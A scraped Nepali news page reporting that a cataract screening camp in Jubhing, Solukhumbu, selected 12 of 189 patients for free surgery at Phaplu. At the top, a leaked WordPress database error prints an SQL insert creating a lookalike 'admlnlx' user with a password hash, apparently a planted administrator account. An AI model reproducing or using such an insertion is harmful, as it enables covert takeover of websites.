WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BV.gwDEfNiuDfEUWEsamhYe4n4hCzQ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:41:21', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशी १ जुभिङबाट १२ मोतिबिन्दुका विरामी छनौट – Gaule Khabar

माप्य दुधकोशी १ जुभिङबाट १२ मोतिबिन्दुका विरामी छनौट

माप्य दुधकोशी १ जुभिङबाट १२ मोतिबिन्दुका विरामी छनौट

सोलुखुम्बु । माप्य दुधकोशी गाउँपालिका १ जुभिङमा आयोजित मोतिबिन्दु छनौट शिविरबाट १२ जना छानिएका छन् ।

तिलगंगा आँखा प्रतिष्ठान काठमाण्डौँ र जिल्ला सामुदायिक आँखा केन्द्र फाप्लुको संयुक्त आयोजनामा सञ्चालन भएको शिविरमा १ सय ८९ जनाले आँखा परीक्षण गराएका थिए । जसमध्ये १२ जनामा मोतिबिन्दुको समस्या देखिएको आखाँ स्वास्थ्य कर्यकर्ता दिनेश राईले बताए ।

शनिबार काँकु स्वास्थ्य चौकीबाट सुरु गरिएको मोतिबिन्दु छनौट शिविर जिल्लाका विभिन्न स्वास्थ्य चौकीमा क्रमश संचालन गरिने र छनौटमा परेका बिरामीहरुको आगामी असोज २४ र २५ गते तिलगंगा आखा प्रतिष्ठानका दक्ष चिकित्सकद्धारा जिल्ला सामुदायिक आँखा केन्द्र फाप्लुमा निशुल्क शल्यक्रिया गरिने राईले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका